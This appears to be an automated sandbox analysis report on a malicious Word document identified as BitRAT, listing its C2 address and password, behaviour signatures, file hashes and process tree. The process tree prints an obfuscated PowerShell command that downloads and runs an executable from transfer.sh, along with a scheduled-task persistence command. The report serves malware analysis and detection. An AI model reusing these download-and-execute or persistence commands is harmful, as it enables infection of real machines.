Analysis

  • max time kernel
    53s
  • max time network
    85s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230831-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2023 15:14

General

  • Target

    Documento_Orslgroup_S.R.L_09_2023.doc

  • Size

    191KB

  • MD5

    68297123bc1ddbbd9336aa121a9dd534

  • SHA1

    2d8016319edb893e0ae600ba8c89f00a30466967

  • SHA256

    17cfb90deb531e2068d99e671423d8d1bcf8f06a0e2666f0108ca8e8b706dd1b

  • SHA512

    29e3e9e7e8a1b5c9fd54d97379e7f73cc2ee8174b950d7bf1b44f6f129893d6dec64c8ddb63f071184ea93bc88f1e5b7d0e1f99304c4af54f42af9042f6d092b

  • SSDEEP

    3072:SbiyWTxSoVHpNY6nemhInf/va46YP6z+dzL:miyWTwoVHp6m0/yl6H9L

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1476
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\dx5ys.exe;C:\Users\Public\dx5ys.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4092
        • C:\Users\Public\dx5ys.exe
          "C:\Users\Public\dx5ys.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Users\Public\dx5ys.exe
            "C:\Users\Public\dx5ys.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:5008
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\dx5ys.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
            5⤵
              PID:3272
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1276
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:1568
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
              5⤵
                PID:4532
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k netsvcs -p
        1⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Enumerates system info in registry
        PID:3900
      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        C:\Users\Admin\AppData\Roaming\pint\pint.exe
        1⤵
        • Executes dropped EXE
        PID:1644

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkdqcogp.n52.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\wsuC4A8.tmp
        Filesize

        14KB

        MD5

        c01eaa0bdcd7c30a42bbb35a9acbf574

        SHA1

        0aee3e1b873e41d040f1991819d0027b6cc68f54

        SHA256

        32297224427103aa1834dba276bf5d49cd5dd6bda0291422e47ad0d0706c6d40

        SHA512

        d26ff775ad39425933cd3df92209faa53ec5b701e65bfbcccc64ce8dd3e79f619a9bad7cc975a98a95f2006ae89e50551877fc315a3050e48d5ab89e0802e2b7

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Admin\AppData\Roaming\pint\pint.exe
        Filesize

        429KB

        MD5

        a1172505a30da4a080b73e066fd4965a

        SHA1

        c3012a046187fc9e04c3cfd0bec991ae7486057b

        SHA256

        5b6c20f1d2b75c2f6c790fd7d3eb403c8385c55d2021fe3ffceed9dc7bfbbcc7

        SHA512

        d595834a15dc01399d9e2a3c95329df663c25a82e9d2b99332e4352ff492cef00cde4b5974b9c7a823f97835ba80b6178d0c0c973314d41f752afcbc340b1eee

      • C:\Users\Public\dx5ys.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\dx5ys.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • C:\Users\Public\dx5ys.exe
        Filesize

        3.8MB

        MD5

        6d4c3a4ff3637ec34f820172f897d476

        SHA1

        d53fe8f0ecb0536088ec9be5247ab6627baf31cb

        SHA256

        c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

        SHA512

        1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

      • memory/1476-27-0x000001EA51A40000-0x000001EA52A10000-memory.dmp
        Filesize

        15.8MB

      • memory/1476-3-0x00007FFA8F6B0000-0x00007FFA8F6C0000-memory.dmp
        Filesize

        64KB

      • memory/1476-9-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-10-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-11-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-1-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-12-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-14-0x00007FFA8D210000-0x00007FFA8D220000-memory.dmp
        Filesize

        64KB

      • memory/1476-15-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-16-0x00007FFA8D210000-0x00007FFA8D220000-memory.dmp
        Filesize

        64KB

      • memory/1476-2-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-26-0x000001EA51A40000-0x000001EA52A10000-memory.dmp
        Filesize

        15.8MB

      • memory/1476-0-0x00007FFA8F6B0000-0x00007FFA8F6C0000-memory.dmp
        Filesize

        64KB

      • memory/1476-4-0x00007FFA8F6B0000-0x00007FFA8F6C0000-memory.dmp
        Filesize

        64KB

      • memory/1476-7-0x00007FFA8F6B0000-0x00007FFA8F6C0000-memory.dmp
        Filesize

        64KB

      • memory/1476-25-0x000001EA51A40000-0x000001EA52A10000-memory.dmp
        Filesize

        15.8MB

      • memory/1476-13-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-8-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-6-0x00007FFA8F6B0000-0x00007FFA8F6C0000-memory.dmp
        Filesize

        64KB

      • memory/1476-42-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-43-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-44-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/1476-48-0x000001EA51A40000-0x000001EA52A10000-memory.dmp
        Filesize

        15.8MB

      • memory/1476-54-0x000001EA51A40000-0x000001EA52A10000-memory.dmp
        Filesize

        15.8MB

      • memory/1476-55-0x000001EA51A40000-0x000001EA52A10000-memory.dmp
        Filesize

        15.8MB

      • memory/1476-5-0x00007FFACF630000-0x00007FFACF825000-memory.dmp
        Filesize

        2.0MB

      • memory/4092-40-0x000001CCAE160000-0x000001CCAE170000-memory.dmp
        Filesize

        64KB

      • memory/4092-34-0x00007FFAA1EC0000-0x00007FFAA2981000-memory.dmp
        Filesize

        10.8MB

      • memory/4092-59-0x000001CCAE160000-0x000001CCAE170000-memory.dmp
        Filesize

        64KB

      • memory/4092-58-0x000001CCAE160000-0x000001CCAE170000-memory.dmp
        Filesize

        64KB

      • memory/4092-57-0x000001CCAE160000-0x000001CCAE170000-memory.dmp
        Filesize

        64KB

      • memory/4092-56-0x00007FFAA1EC0000-0x00007FFAA2981000-memory.dmp
        Filesize

        10.8MB

      • memory/4092-97-0x00007FFAA1EC0000-0x00007FFAA2981000-memory.dmp
        Filesize

        10.8MB

      • memory/4092-33-0x000001CC95C20000-0x000001CC95C42000-memory.dmp
        Filesize

        136KB

      • memory/4092-41-0x000001CCAE160000-0x000001CCAE170000-memory.dmp
        Filesize

        64KB

      • memory/4092-39-0x000001CCAE160000-0x000001CCAE170000-memory.dmp
        Filesize

        64KB

      • memory/4696-102-0x0000000004E00000-0x0000000004E10000-memory.dmp
        Filesize

        64KB

      • memory/4696-101-0x00000000053C0000-0x0000000005964000-memory.dmp
        Filesize

        5.6MB

      • memory/4696-99-0x0000000074CE0000-0x0000000075490000-memory.dmp
        Filesize

        7.7MB

      • memory/4696-100-0x0000000000140000-0x0000000000518000-memory.dmp
        Filesize

        3.8MB

      • memory/4696-109-0x0000000074CE0000-0x0000000075490000-memory.dmp
        Filesize

        7.7MB

      • memory/5008-116-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-125-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-105-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-113-0x0000000074BF0000-0x0000000074C29000-memory.dmp
        Filesize

        228KB

      • memory/5008-114-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-115-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-106-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-117-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-118-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-119-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-120-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-121-0x0000000074F70000-0x0000000074FA9000-memory.dmp
        Filesize

        228KB

      • memory/5008-122-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-123-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-124-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-108-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-127-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-128-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-129-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-132-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-131-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-133-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-134-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-135-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-136-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-137-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-138-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-139-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB

      • memory/5008-103-0x0000000000400000-0x00000000007CE000-memory.dmp
        Filesize

        3.8MB